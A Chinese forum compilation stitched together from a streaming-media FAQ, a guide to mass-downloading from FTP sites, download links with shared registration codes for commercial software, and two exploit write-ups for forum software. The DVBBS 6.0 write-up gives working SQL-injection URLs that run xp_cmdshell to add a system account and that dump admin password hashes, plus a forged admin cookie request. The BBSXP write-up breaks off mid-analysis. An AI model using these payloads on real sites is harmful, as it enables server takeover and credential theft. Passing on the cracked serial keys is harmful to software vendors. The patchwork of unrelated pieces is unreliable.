20.為何我的RealProducer8.5Plus看不到下面的一些菜單和按鈕了呢？
答：這個(gè)是我自己機(jī)器上面的毛病，因?yàn)楸救擞玫膚in98SE里面的字體選在“大字體“，換成“小字體“就正常了。分辨率800x600@75hz-16bit。

21.如何調(diào)整realproducer plus制作RM文件時(shí)的碼率？
實(shí)際上你可以自己設(shè)定RM文件碼率的！realproducer plus提供的那8種碼率只是real公司預(yù)先設(shè)定好的建議值而已，而這些建議值是可以自己改的，方法是在realproducer plus的界面上選：Options->Target Audience Settings->or RealVideo Clips...->Target Bitrate->Target Bitrate！用這個(gè)方法你可以把原來(lái)默認(rèn)的LAN設(shè)置碼率改為1.2M，然后在producer界面處的Target Audience也選擇用LAN來(lái)壓縮，那么你做出來(lái)的節(jié)目就是1.2M的碼率了。

22.請(qǐng)問要選擇什么樣的影像采集卡？
現(xiàn)在市場(chǎng)上的影像采集卡有很多種，但是要記住！一定要購(gòu)買可以抓取AVI格式的卡，千萬(wàn)不要買抓取MPEG格式的卡，這可是沒有辦法作隨選視頻的，因?yàn)镸PEG格式是專門制作VCD或DVD用的，但也不是說(shuō)買了可以抓取AVI格式的卡，就可以作隨選視頻了，因?yàn)檫€是有些蠻便宜的影像采集卡，品質(zhì)也不錯(cuò)，而且抓取的影片也不會(huì)有漏格，有的廠商產(chǎn)品使用的AVI格式的規(guī)格是自己規(guī)格，隨選視頻必須是Microsoft Video 1規(guī)格的AVI，不是這個(gè)規(guī)格的AVI采集卡，千萬(wàn)不要買，會(huì)產(chǎn)生許多問題。

23.請(qǐng)問要選擇什么樣的聲音采集卡？
沒有所謂的聲音采集卡，因?yàn)槁暱ň涂梢圆杉曇簦ㄗh您選擇品質(zhì)比較好的聲卡，最好是16位以上的聲卡，推薦創(chuàng)新聲卡，因?yàn)樗鼘?duì)Windows系統(tǒng)會(huì)有比較好的支持。

24.微軟網(wǎng)站一直強(qiáng)調(diào)Windows Media 4.x的壓縮格式是MPEG4，這不就是VCD的格式嗎？
MPEG是一種影片壓縮格的技術(shù)，VCD則是利用MPEG1或MPEG2的壓縮技術(shù)來(lái)制作，而DVD是利用MPEG2的技術(shù)來(lái)制作，這次Windows Media 4.x的技術(shù)是使用MPEG4，這不是微軟的專利，是經(jīng)由全球各大廠商組織協(xié)會(huì)制定出來(lái)的，未來(lái)使用MPEG4的壓縮技術(shù)來(lái)制作影片的產(chǎn)品一定會(huì)很多，原因是這個(gè)規(guī)格的影片品質(zhì)及文件大小都非常精致，所以并不排除以后VCD或DVD會(huì)使用MPEG4。

25.為什么要學(xué)習(xí)影片編輯軟件？
很多時(shí)候我們可以直接使用Windows Media Tools抓取隨選視頻或音頻（ASF網(wǎng)絡(luò)影片或聲音），但更多時(shí)候，可能取得經(jīng)過(guò)編輯過(guò)得影片來(lái)源，譬如說(shuō)我們要拍攝公司簡(jiǎn)介、商品簡(jiǎn)介或者教學(xué)記錄等等，通常是東拍一段西拍一段，然后經(jīng)過(guò)影片編輯軟件抓取影片及剪輯影片，所以學(xué)習(xí)影片編輯軟件是十分重要的，一般只需能進(jìn)行影片的編輯就可以了，不需要學(xué)到電視、電影的高*技術(shù)。

26.流媒體整個(gè)制作流程是什么？
這個(gè)流程分為3個(gè)方式：

A.需要拍攝影片或錄制聲音之后再作隨選視頻或音頻

流程為：拍攝影片或錄制聲音→到電腦上采集影片或聲音→使用影片編輯軟件編輯影片和聲音→輸出編輯完成的影片和聲音→到Windows Media Encoder軟件轉(zhuǎn)換成網(wǎng)絡(luò)影片或聲音→放置影片和聲音到網(wǎng)絡(luò)上→制作Homepage來(lái)連接完羅影片或聲音。

B.如果已經(jīng)有影片或聲音來(lái)源，可以直接抓取隨選視頻或音頻

流程為：將來(lái)源和影片裝到放映設(shè)備上→到Windows Media Encoder軟件直接抓取成網(wǎng)絡(luò)影片和聲音→放置影片或聲音到網(wǎng)絡(luò)上→制作Homepage來(lái)鏈接網(wǎng)絡(luò)影片和聲音。

C.影片和聲音的網(wǎng)絡(luò)Live直播

流程為：將來(lái)源的影片和聲音裝到放映設(shè)備上（或架設(shè)攝像機(jī)并連接到電腦）→利用Windows Media Encoder軟件直接抓取成網(wǎng)絡(luò)影片或聲音→設(shè)定Windows Media Server→制作Homepage并連接到網(wǎng)絡(luò)Live影片或聲音。

27.安裝軟件一定要有順序嗎？
最好按順序安裝IE→Powerpoint 2000→Adobe Premiere 6→Media Play→Media Tools→Media on-demand Producer→Media Server。

28.如何調(diào)整realproducer plus制作RM文件時(shí)的碼率？
實(shí)際上你可以自己設(shè)定RM文件碼率的！realproducer plus提供的那8種碼率只是real公司預(yù)先設(shè)定好的建議值而已，而這些建議值是可以自己改的，方法是在realproducer plus的界面上選：Options->Target Audience Settings->or RealVideo Clips...->Target Bitrate->Target Bitrate！用這個(gè)方法你可以把原來(lái)默認(rèn)的LAN設(shè)置碼率改為1.2M，然后在producer界面處的Target Audience也選擇用LAN來(lái)壓縮，那么你做出來(lái)的節(jié)目就是1.2M的碼率了.

一點(diǎn)意見.
通常rar的文件要winrar這個(gè)軟件來(lái)解壓縮.有些文件用winrar分割,但是應(yīng)該有一個(gè)頭文件,后醉應(yīng)該是exe,不過(guò)要全部下載完才能打開,小技巧:解壓縮時(shí)候會(huì)生成臨時(shí)文件,它的大小是0,可是能用播放器放.不過(guò)保存有點(diǎn)問題了。
后綴為.000 .001 .002 .....的文件如何解壓？
應(yīng)該用合并工具先合并。
可以用，
軟件名稱：HJSplit
最新版本：2.2
文件大小：168KB
軟件授權(quán)：免費(fèi)軟件
使用平臺(tái)：Win95/98/NT/2000
發(fā)http://www.freebyte.com ;;;
原版下載：不需要
軟件簡(jiǎn)介：
　　小巧好用的文件分割工具，能分割任何類型文件和任
何大小。也能將下載回來(lái)的分割文件合并！


[菜鳥必讀]極限下載秘技[公告][建議]
從網(wǎng)上下載，聽起來(lái)容易，但想真正成為高手，就要做到“下別人之不能下，載別人所不會(huì)載”，其中的門道可并不簡(jiǎn)單。
提到下載，很多人都認(rèn)為所謂的Download不過(guò)是從網(wǎng)上把軟件或MP3復(fù)制到硬盤中的一個(gè)過(guò)程。然而，如果真用這個(gè)標(biāo)準(zhǔn)來(lái)衡量的話，恐怕把全世界網(wǎng)民至少能數(shù)出幾億個(gè)下載高手來(lái)。可實(shí)際上，下載包含的內(nèi)容遠(yuǎn)不止于此。從理論上講，即使是瀏覽普通的網(wǎng)頁(yè)也應(yīng)該算是下載的一種，何況去下載軟件、音樂、圖書等更精彩的資源了。網(wǎng)絡(luò)的開放性不斷吸引著人們?nèi)ふ覍?duì)自身有價(jià)值的東西，而各種商業(yè)網(wǎng)站又為了自身的利益，不斷依靠“先進(jìn)”技術(shù)使它們提供的資源逐漸封閉化。為了下載一個(gè)軟件而打開三層頁(yè)面的網(wǎng)站并不少見，而更多的圖庫(kù)站點(diǎn)更需要您不斷點(diǎn)擊大大小小的鏈接才肯露出廬山真面目；說(shuō)是免費(fèi)閱讀圖書，又不讓您下載，給您一個(gè)連抓圖都不支持的Java窗口，慢慢看去吧！（估計(jì)等您把書看完，您的網(wǎng)費(fèi)開銷能買十本原版書了。）有人說(shuō)，網(wǎng)上的免費(fèi)是糖衣炮彈：想下載軟件，請(qǐng)您看廣告；想聊天，請(qǐng)您看廣告；想要免費(fèi)信箱，請(qǐng)您看廣告（更有附加在您每封郵件末尾的廣告）。還有，某些精彩的Flash動(dòng)畫、Real影片以及各種在線播放的音頻和視頻，更是“只可遠(yuǎn)觀而不可褻玩焉”——不支持下載！
難道就沒有把糖衣吃掉再拋棄炸彈的方法嗎？當(dāng)然有！正所謂魔高一尺，道高一丈。對(duì)付特別的站點(diǎn)就要使用特別的方法，才能獲取某些平時(shí)無(wú)法取得或者十分難以取得的資源。您想下載嵌在網(wǎng)頁(yè)里的Flash動(dòng)畫嗎？您想下載只提供在線播放的Real格式電影嗎？您想下載收費(fèi)的電子圖書嗎？您想學(xué)習(xí)更強(qiáng)大的超批量下載技巧嗎？那就千萬(wàn)不要錯(cuò)過(guò)下面的文字，這就是——極限下載秘技！

獲取真實(shí)的下載地址

工欲善其事，必先利其器，我們當(dāng)然不必去研究如何更加科學(xué)地使用IE的下載窗口，因此您至少需要下面兩個(gè)流行的下載軟件之一：網(wǎng)際快車FlashGet（推薦使用）或網(wǎng)絡(luò)螞蟻NetAnts。

作為一個(gè)網(wǎng)民，筆者有時(shí)不得不向朋友提供某個(gè)軟件的下載地址，然而這就出現(xiàn)了一個(gè)關(guān)于真實(shí)下載地址的問題。

首先，對(duì)同一個(gè)軟件，我這兒有兩個(gè)下載地址http://download.sina.com.cn/scgi ... oad/fm311ch0108.exe。如果是您的話，您更愿意接受哪個(gè)呢？很顯然，后者是一個(gè)典型的URL，它相對(duì)于第一個(gè)地址來(lái)說(shuō)更加明顯，也不容易寫錯(cuò)。而實(shí)際上這兩個(gè)地址所指向的是同一個(gè)文件，它們?cè)趯?shí)質(zhì)上毫無(wú)差別。那么如何才能獲得真實(shí)的下載地址呢？

FlashGet的“重新定位到”。 網(wǎng)絡(luò)螞蟻的“重新定向”。

當(dāng)您采用軟件來(lái)下載時(shí)，一般都會(huì)在下載任務(wù)欄下面出現(xiàn)一個(gè)進(jìn)度指示區(qū)。以FlashGet為例，所謂的“圖表/日志”就表示著指定任務(wù)的下載進(jìn)程。細(xì)心的朋友可能會(huì)發(fā)現(xiàn)，各種下載軟件在把任務(wù)進(jìn)行分段下載時(shí)，其中的每一段都會(huì)有詳細(xì)的進(jìn)度說(shuō)明。在下載任務(wù)添加完畢后，點(diǎn)擊“圖表/日志”下方的“Jet 1”，您會(huì)看到下載信息中經(jīng)常會(huì)出現(xiàn)這樣一行文字：“重新定位到……”。實(shí)際上，這個(gè)重新定位的目的地就是該任務(wù)的真實(shí)下載地址。無(wú)論您原始的下載地址是像上面例子那么長(zhǎng)的一大串字母和符號(hào)，還是一個(gè)ASP地址或者別的什么，只要您認(rèn)準(zhǔn)“重新定向”的位置，保證真實(shí)的下載地址原形畢露！另外，網(wǎng)絡(luò)螞蟻也具備相關(guān)的功能，其重新定向的位置以“Location”表示。

也許您會(huì)問，“知道了真實(shí)的下載地址，又有什么用？”沒關(guān)系，這只是一個(gè)預(yù)備知識(shí)，您現(xiàn)在只要掌握這個(gè)技巧就好，一會(huì)兒會(huì)用到的。

瘋狂下載連鍋端

必須承認(rèn)，這個(gè)部分的內(nèi)容是關(guān)于一種極度瘋狂的下載行為的，然而它又比用WebZip這樣的軟件去下載站點(diǎn)理智一些。畢竟像WebZip那種通過(guò)下載頁(yè)面的層數(shù)來(lái)控制下載的信息量，這種行為無(wú)論怎么看也是非常值得懷疑的——天知道您的站點(diǎn)有多少個(gè)層次！那么，如果您只是為了得到幾個(gè)軟件，就在WebZip的地址欄http://www.download.com.cn”，這也未免太小題大做了，況且為了讓我剛才說(shuō)的“獲得真實(shí)下載地址”的技巧看起來(lái)比較有用，就把這個(gè)瘋子般的下載術(shù)放在腦后吧。下面讓我來(lái)告訴您，如何最快速地得到更多有用的東西……

以國(guó)內(nèi)著名的下載站點(diǎn)“中國(guó)http://www.download.com.cn）為例，我們首先通過(guò)上述的方法，使用下載軟件查出了某個(gè)軟件的真實(shí)下載地址（過(guò)程我就不重復(fù)了ftp://ftp.download.com.cn/pub/new_tools/sunglass.zip），然后只要稍作處理就可以讓它變得有用：這個(gè)地址去掉了末尾的文件名ftp://ftp.download.com.cn/pub/new_tools/”，所表示的含義就是該軟件的目錄。下面，您可以打開IE瀏覽器，輸入這個(gè)目錄地址，就會(huì)立刻看到與我們要下載的軟件處于同一個(gè)目錄下的其他所有軟件。

所有的軟件都出現(xiàn)在這個(gè)窗口中。

如果您是一個(gè)新軟件的試用者，那您可有福了。直接把想要的軟件拖拽到Windows的窗口中，下載過(guò)程自動(dòng)完成，連下載工具都省了。然而，您更可以通過(guò)FTP站點(diǎn)的目錄結(jié)構(gòu)游走整個(gè)中國(guó)下載站點(diǎn)，把所有軟件盡收眼底，盡情下載吧。

對(duì)于其他FTP站點(diǎn)的地址，此方法依然適用。因?yàn)榇蟛糠諪TP站點(diǎn)都是支持匿名登陸的，但匿名用戶的權(quán)限一般都是“只讀”，也就是說(shuō)您可以任意下載FTP站點(diǎn)中的任何軟件，卻不能上傳或刪除任何東西。不過(guò)對(duì)于下載狂人來(lái)說(shuō)，這足夠了。怎么樣？這種瘋狂的“連鍋端”下載技巧令您感受到下載的快感了嗎？

吝嗇鬼下載術(shù)

相對(duì)于瘋狂的端站點(diǎn)技巧，還有一種細(xì)致得錙銖必較的令寬帶上網(wǎng)或公款上網(wǎng)用戶不屑一顧卻讓飽受撥號(hào)上網(wǎng)龜速之苦的群眾歡欣鼓舞而津津樂道的——吝嗇鬼下載術(shù)。

如果經(jīng)常下載軟件的話，您會(huì)發(fā)現(xiàn)從網(wǎng)上下載到的軟件大多是zip格式的。這樣做一來(lái)為了節(jié)省寶貴的服務(wù)器空間，二來(lái)可以減少下載軟件的信息傳輸量；然而之所以用zip格式進(jìn)行壓縮卻很少用到rar和ace這些壓縮格式，則主要是因?yàn)閦ip的普及程度高。可是您發(fā)現(xiàn)沒有，當(dāng)您把辛辛苦苦下載回來(lái)的zip包打開的時(shí)候，是否會(huì)發(fā)現(xiàn)有很多與應(yīng)用程序無(wú)關(guān)的文件呢？比如站長(zhǎng)們?yōu)樽约捍虻男V告啦，根本看不懂的英文Readme啦……如果能把沒用的家伙們統(tǒng)統(tǒng)排斥在外，您是否會(huì)感到一點(diǎn)點(diǎn)輕松呢？還有這種情況：朋友把許多文件都?jí)嚎s成一個(gè)體積巨大的zip并傳到網(wǎng)上，而您現(xiàn)在只需要其中的一個(gè)小文件，怎么辦呢？

Zip預(yù)覽的功能在左下角。

有Download Mage就沒問題了。這個(gè)簡(jiǎn)明的下載程序雖不如FlashGet那樣知名，但它的最大特點(diǎn)就是能事先預(yù)覽要下載的zip壓縮包中的文件，然后您可以選擇哪個(gè)文件下載，哪個(gè)文件不下載，把不受歡迎的文件排除掉，下載不就更輕松了嗎？

Download Mage也能像FlashGet那樣直接截獲IE中的URL并展開下載，但需要您先在它的Setup標(biāo)簽中啟用IE支持插件（Install IE Support），當(dāng)然Netscape也是可以被支持的。接下來(lái)，只要您從瀏覽器中點(diǎn)擊任意的軟件下載鏈接，Download Mage就會(huì)自動(dòng)彈出并準(zhǔn)備開始下載。此時(shí)點(diǎn)擊左下角的Zip預(yù)覽（Zip Preview）按鈕，您就可以清楚地看到該Zip壓縮包中有多少個(gè)文件，各自的大小是多少。按住Ctrl鍵復(fù)選您想要下載的文件，再確保“Download Selected Files（下載選定的文件）”被勾中后，按回車鍵即可開始這吝嗇鬼般的下載術(shù)了！

Zip壓縮包中的文件清晰可見。

那么，到這里為止，最瘋狂和最保守的下載方法都有介紹了，下面就來(lái)點(diǎn)更高深的技巧吧！

超批量下載

所謂的“批量下載”實(shí)際上是下載工具的一項(xiàng)普通功能。下載程序通過(guò)分析頁(yè)面上的各種鏈接，把所有可能下載的文件都羅列出來(lái)。這時(shí)您只需簡(jiǎn)單地選擇需要下載的文件，或者通過(guò)文件類型進(jìn)行批量選擇某種文件，之后下載的任務(wù)就完全交給程序了。看，就是如此簡(jiǎn)單的一個(gè)功能，卻能省去我們大量不必要的重復(fù)勞動(dòng)。但是目前實(shí)際的應(yīng)用情況卻是：網(wǎng)站為了增加瀏覽量，竟然給每張圖片都制作一個(gè)html頁(yè)面，或者再來(lái)個(gè)專門的鑒賞頁(yè)什么的，結(jié)果反倒大大增加了用戶的負(fù)擔(dān)。要知道很多人都希望能盡快收集到更多的優(yōu)質(zhì)圖片，但是如此的收集方法是不是太麻煩了呢？

我們不妨先來(lái)看一個(gè)例http://www.51m.com/pic/2/best124.htm，這是一個(gè)典型的圖庫(kù)下載頁(yè)面。按照每個(gè)縮略圖所指向的鏈接，不難發(fā)現(xiàn)我們只有逐個(gè)打開每張圖片所在的頁(yè)面，才能看到并且保存相應(yīng)的圖片。如果您還是覺得不直觀的話，那么我就在這里使用“批量下載”，看看會(huì)出現(xiàn)什么效果。

批量下載。

在頁(yè)面上點(diǎn)鼠標(biāo)右鍵，選擇“使用網(wǎng)際快車下載全部鏈接”，于是出現(xiàn)所有由FlashGet探索到的可供下載的文件。仔細(xì)觀察一下就不難看出，其中沒有任何圖形文件！也就是說(shuō)普通的批量下載在這里完全不起作用。

批量下載不行，怎么辦？

顯然，您需要一種更好的批量下載的方法，來(lái)幫助您提高下載的效率。下面就要看FlashGet的絕技了。0.94版本以后的FlashGet增加了一項(xiàng)非常誘人的功能：站點(diǎn)資源探索器。它能夠沿著您提交的URL盡可能找到所有可以下載的文件，啟動(dòng)站點(diǎn)資源探索器的快捷鍵是F7。

下面，在網(wǎng)站資源探索器的地址欄中鍵入剛才那個(gè)網(wǎng)址并按回車……您看到什么了？是不是出現(xiàn)了一些jpg圖片？如果您覺得這些圖片排列得不夠明顯，就點(diǎn)擊一下“類別”欄目，這下明顯了吧？選中這些圖片，點(diǎn)擊工具欄上的“下載”，那么您就連URL都不用*心了，F(xiàn)lashGet會(huì)自動(dòng)為您下載這些圖片！

資源一旦被探索到，就可以被FlashGet下載。

這就是強(qiáng)大的“超批量下載”，您覺得這個(gè)技巧好用嗎？相信在實(shí)際的應(yīng)用過(guò)程中，您一定能逐漸體會(huì)到它的優(yōu)越性

如何看電影和一些必備工具
首先聲明，不要對(duì)我說(shuō)連接無(wú)效的話，因?yàn)闀r(shí)間過(guò)了多天。我想你可以在收縮引擎中尋找，很多的，我要是有空間當(dāng)然可以提供，可惜我沒有，sorry。

電影.asf .mpeg結(jié)尾的文件用media player觀看
ram,rm結(jié)尾的用realplayer觀看
realplayer加強(qiáng)版,注冊(cè)碼:1116-11-0060
http://66.54.221.196/tool/real.exe ;;;

有的mpeg和ask的文件是DIVX編碼的需要DIVX插件,安裝插件后才能用media player觀看
這里斑竹推薦一個(gè)專用看DIVX的player,占用系統(tǒng)資源更少
http://66.54.221.196/tool/player.exe ;;;

文件結(jié)尾r01 r02 exe這種是一個(gè)大文件用winrar分割成為若干小塊，需要用winrar合并后才能觀看,winrar
http://66.54.221.196/tool/wrar271.exe ;;;

文件結(jié)尾001 002 003這種是用hjsplit分割的文件，需要用hjsplit合并后觀看
http://66.54.221.196/tool/hjsplit.zip ;;;

mms://這種是media player的在線播放協(xié)議，可以直接在線觀看，下載要用VCR
用法和flashget螞蟻等差不多
http://66.54.221.196/tool/vcr10b3.zip這個(gè)地址可能壞了.我沒有空間上傳.它有500k左右.文件名是vcr.exe請(qǐng)用收瑣引擎自己找.sorry

rstp://這種是realplayer的在線播放協(xié)議，可以直接在線觀看下載要用VCR
用法和flashget螞蟻等差不多

制作工具

RealProducer Plus v8.5（內(nèi)含注冊(cè)碼)
這是Real公司出品的RM制作最強(qiáng)大的軟件了。千萬(wàn)記住 RealProducer 這個(gè)軟件有很多版本，一定要用 Plus 版的！！！是同類軟件中最好用的，軟件容量不大，功能專業(yè)專一而強(qiáng)大，又是Real公司這個(gè)RM的鼻祖出品的，非常好的制作RealMovie的軟件。
http://66.54.221.196/tool/plus.zip ;;;212-09483-1266

Real格式文件壓縮至尊v1.40注冊(cè)版
軟件大小：2448K
更新時(shí)間：2001-5-12
注冊(cè)碼：TianYusoftware is good
下載&nbsftp://61.139.37.147/rj/soft/tyureal.exe ;;;

把兩個(gè)MPG合成一個(gè)MPG的方法
用dos下
copy /b 1.mpg+2.mgp final.mpg

如何合并多個(gè)內(nèi)容連續(xù)的rm文件？
與分割RM一樣，用RealProducer Plus 軟件
File->Edit Realmedia File，打開Realmedia Editor，然后File->Open Realmedia File，從目錄中找到要合并的第一個(gè)RM文件并打開，接著File->Append Realmedia File，從目錄中選要合并的第二個(gè)文件并打開，如有第三第四類推，這時(shí)已經(jīng)合并好了，F(xiàn)ile->Save Realmedia File As，取個(gè)名字，哈哈，大功告成
創(chuàng)建時(shí)間：2003-05-01
文章屬性：原創(chuàng)
文章來(lái)源：灰色軌跡
文章提交：PsKey (PsKey_at_hotmail.com)

PsKey<PsKey@hotmail.com>
www.isgrey.com

>>>Dedicated This Scrap To CaoJing<<<

涉及版本：
^^^^^^^^^^
DVBBS VER 6.0.0 &DVBBS VER 6.0.0 SP1&DVBBS VER 6.0.0 SP2<ACCESS&MSSQL>
//低版本沒看，反正低版本的問題成堆，也不少這一個(gè)-)

描述：
^^^^^^
DVBBS是一款由WWW.ASPSKY.NET開發(fā)和維護(hù)的源代碼開放的Asp論壇；由于其tongji.asp文件沒有過(guò)濾用戶提交傳遞給SQL查詢的輸入，導(dǎo)致遠(yuǎn)程攻擊者可以利用這個(gè)漏洞進(jìn)行SQL注入攻擊，進(jìn)而威脅論壇或服務(wù)器安全。

具體：
^^^^^^
DVBBS經(jīng)analysist加固后，消除了大批安全隱患，并引入了很多的安全措施，如果大家對(duì)編寫安全的Asp代碼有興趣，DVBBS將是一個(gè)很好的參考！雖然Asp語(yǔ)法簡(jiǎn)單，出現(xiàn)問題的情況也就那么幾種。小型Asp程序中，程序員只要稍微有點(diǎn)安全意識(shí)就可以避免出現(xiàn)漏洞；但在較大規(guī)模的紛雜的程序中，難免出現(xiàn)遺漏，而只要有一個(gè)缺陷存在，系統(tǒng)安全就得不到保障。說(shuō)了這么多廢話，我們轉(zhuǎn)入正題，問題其實(shí)很簡(jiǎn)單，看代碼：
---------------------------------------------------------
6   if request("orders")=1 then
7      call tongji()
8   elseif request("orders")=2 then
9    call topuser()
...
60  sub topuser()
61    set rs=server.createobject("adodb.recordset")
62    sql="select top "&request("n")&" username,useremail,userclass,oicq,homepage,article,addDate  from [user] order by article desc"
---------------------------------------------------------
很明顯吧？（你怎么就沒發(fā)現(xiàn)呢~呵呵），變量 n 沒有經(jīng)任何檢查就直接放到SQL查詢中了。

攻擊方法：
^^^^^^^^^^
1:MSSQL
如果是MSSQL版的，還客氣什么，直接提交如下URL：
http://www.target.com/asp/dvbbssql/tongji.asp?orders=2&N=2%20password%20from%20admin;%20exec%20master..xp_cmdshell%20'net%20user%20love%20hack%20/add'%20--
順利的話，對(duì)方系統(tǒng)便會(huì)添加love/hack用戶，順便還可以看到論壇管理員的經(jīng)MD5加密后的密碼字符串（FT，系統(tǒng)用戶都添加了，論壇管理員算什么？），由于本文不是sql injection教學(xué)，就此打住。

2：ACCESS
如果是ACCESS版的，哈哈，很多朋友緊張起來(lái)了，看看tongji.asp下面的代碼：
---------------------------------------------------------
66    response.write "document.write('<FONT color=#b70000>□</FONT><span style=""font-size:9pt;line-height: 15pt""><a href=http://www.pydz.com/sunwinbbs/dispuser.asp?name="& rs(0) &" target=_blank title=查看"&rs(0)&"的個(gè)人資料>');"
67       response.write "document.write('"&rs(0)&"</a>');"
68    response.write "document.write('</span><br>');"
---------------------------------------------------------
看見有趣的東西了沒有？沒錯(cuò)，就是 rs(0) ，如果我們指定 “n=50 userpassword,”(n的值隨便選擇，看你想偷看多少用戶的密碼啦)，嘿嘿，現(xiàn)在rs(0) 就不是 username 而是 userpassword了，例如：

http://www.target.com/asp/dvbbs/tongji.asp?orders=2&N=2
返回：
---------------------------------------------------------
document.write('□');document.write('admin');document.write('
');document.write('□');document.write('ss');document.write('
');
---------------------------------------------------------

http://www.target.com/asp/dvbbs/tongji.asp?orders=2&N=2%20userpassword,
返回：
---------------------------------------------------------
document.write('□');document.write('18e071ccfb2d1c99');document.write('
');document.write('□');document.write('acd5fdfea300e88a');document.write('
');
---------------------------------------------------------
哦，原來(lái)admin的密碼是18e071ccfb2d1c99，但是經(jīng)過(guò)MD5加密的，別急，用同樣的辦法你可以把a(bǔ)dmin的userid、回答問題....全部搞到手。

得到這些能干什么？（準(zhǔn)備暴力破解可以略過(guò)不看）
曾經(jīng)看到一篇奇文《得到論壇數(shù)據(jù)庫(kù)后如何快速奪取管理員密碼<對(duì)動(dòng)網(wǎng)>》，內(nèi)容大致是：自己安裝一個(gè)動(dòng)網(wǎng)論壇，把得到的加過(guò)密的16位密碼復(fù)制下來(lái)，貼到你剛才注冊(cè)的ID的密碼處，用找回密碼功能就可以了，只要提示問題答案填寫正確，密碼就發(fā)到你的信箱了。
基本上是鬼扯，但作者視MD5如草芥的魄力不得不令小弟佩服。

在老版本的動(dòng)網(wǎng)中，得到這些信息后可以直接修改用戶密碼，但在6.0中消除了這一隱患，試看 modifypsw.asp相關(guān)代碼：
---------------------------------------------------------
elseif md5(trim(request("oldpsw")))<>trim(rs("userpassword")) then
          errmsg=errmsg+"<br>"+"<li>輸入的舊密碼錯(cuò)誤，請(qǐng)重新輸入。"
        founderr=true
        exit sub
---------------------------------------------------------
哈哈，不行了吧！

看看管理員操作論壇時(shí)到底需要些什么，舉個(gè)例子，刪帖的時(shí)候：

---------------------------------------------------------
POST /asp/dvbbs/admin_postings.asp?action=delet HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Referer: http://www.target.com/asp/dvbbs/admin_postings.asp?action=刪除主題&BoardID=2&ID=2
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.target.com
Content-Length: 124
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsky=userhidden=2&password=18e071ccfb2d1c99&userid=1&userclass=%B9%DC%C0%ED%D4%B1&username=admin&usercookies=0; iscookies=0; BoardList=BoardID=Show; ASPSESSIONIDAASCSCDC=IPKLMGFAKFJLMOLNMMEMFDGC; upNum=0

title=%B9%E0%CB%AE&content=&doWealth=-7&douserCP=-5&douserEP=-5&id=2&replyid=&boardid=2&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7
---------------------------------------------------------

明白了吧，這里頭該有的我們都可以得到，大家要是有時(shí)間就幫論壇管理員刪刪那些垃圾帖吧：）

還可以做什么？動(dòng)動(dòng)腦子，你可以做到更多。

后記：心情太不美麗了，臭屁了這么久您可不要厭煩。Have a nice day! 新版bbsxp注入漏洞再現(xiàn),可直接得到管理員帳戶密碼
——我找到bbsxp5 sp1漏洞的過(guò)程總結(jié)
前期雜志有篇文章是關(guān)于BBSXP的，用的是Cookie注入攻擊，作者真是思路巧妙，可以想到邏輯漏洞。當(dāng)時(shí)看了文章后，學(xué)校有事情就沒讀代碼。暑假閑著無(wú)事，所以就把最新版的BBSXP下載下來(lái)讀了一遍。BBSXP確實(shí)短小精悍，文件有少又短，不過(guò)比起DVBBS無(wú)論從功能上還是界面上還是有點(diǎn)差別，不過(guò)從漏洞上比還確實(shí)無(wú)分上下， 經(jīng)過(guò)了3年的測(cè)試，還是多少有點(diǎn)瑕疵。

一．漏洞尋找
論壇對(duì)字符串輸入用HTMLEncode轉(zhuǎn)換，數(shù)字類型的用int函數(shù)調(diào)整，Isnumeric函數(shù)判斷。很顯然查詢中有數(shù)字和字符串作為值輸入的肯定不能利用了。不能做為值輸入可以做為什么輸入呢？這就是問題的關(guān)鍵。我把每個(gè)文件帶著這個(gè)思路粗略瀏覽了一遍，用了很長(zhǎng)時(shí)間才在search.asp（好象以前就有過(guò)漏洞，改了原來(lái)的卻有了新的）找到了漏洞，一起看看代碼。
<!-- #include file="setup.asp" -->
<%
top
if Request.Cookies("username")=empty then error("<li>你還未<a href=login.asp>登錄</a>社區(qū)")
DetectPost
if Request("menu")="ok" then
search=Request("search")
forumid=Request("forumid")
TimeLimit=Request("TimeLimit")
content=HTMLEncode(Request("content"))
searchxm=HTMLEncode(Request("searchxm"))
searchxm2=HTMLEncode(Request("searchxm2"))
searchxm2=replace(searchxm2,"@","&")
if content=empty then content=Request.Cookies("username")
if isnumeric(""&forumid&"") then forumidor="forumid="&forumid&" and"
if search="author" then
item=""&searchxm&"='"&content&"'"
elseif search="key" then
item=""&searchxm2&" like '%"&content&"%'"
end if
if TimeLimit<>"" then TimeLimitList="and lasttime>"&SqlNowString&"-"&int(TimeLimit)&""
sql="select top "&MaxSearch&" * from forum where deltopic<>1 and "&forumidor&" "&item&" "&TimeLimitList&" order by lasttime Desc "
rs.Open sql,Conn,1
……


我們仔細(xì)研究一下 sql=”select top “&MaxSearch …這句，其中MaxSearch是定義好的，默認(rèn)值為500，剩下3處是從外面輸入的。
1．if isnumeric(""&forumid&"") then forumidor="forumid="&forumid&" and"
只要forumid輸入為空，那么forumidor就為空.
2．if TimeLimit<>"" then TimeLimitList="and lasttime>"&SqlNowString&"-"&int(TimeLimit)&""
TimeLimit是個(gè)整數(shù)，隨便輸入（輸入個(gè)1），那么TimeLimitList變成” and lasttime>now()-1”,在MSSQL中變成” and lasttime>getdate()-1”.
3. if search="author" then
item=""&searchxm&"='"&content&"'"
elseif search="key" then
item=""&searchxm2&" like '%"&content&"%'"
end if
只要search=”author”,content隨便輸入(輸個(gè)abcd)，那么item= HTMLEncode(searchxm)=’abcd’,只要我們構(gòu)造好輸入，通過(guò)上面的語(yǔ)句，就把SQL語(yǔ)句變?yōu)椋?

select top 500 * from forum where deltopic<>1 and [ HTMLEncode(searchxm)] =’abcd’ and lasttime>now()-1 order by lasttime Desc
用中括號(hào)括起來(lái)的部分前后都沒單引號(hào)，顯然可以利用了。

先看看 HTMLEncode函數(shù)
function HTMLEncode(fString)
fString=replace(fString,";",";")
fString=server.htmlencode(fString)
fString=replace(fString,"'","'")
fString=replace(fString,"--","--")
fString=replace(fString,"\","\")
fString=replace(fString,vbCrlf,"<br>")
HTMLEncode=fString
end function
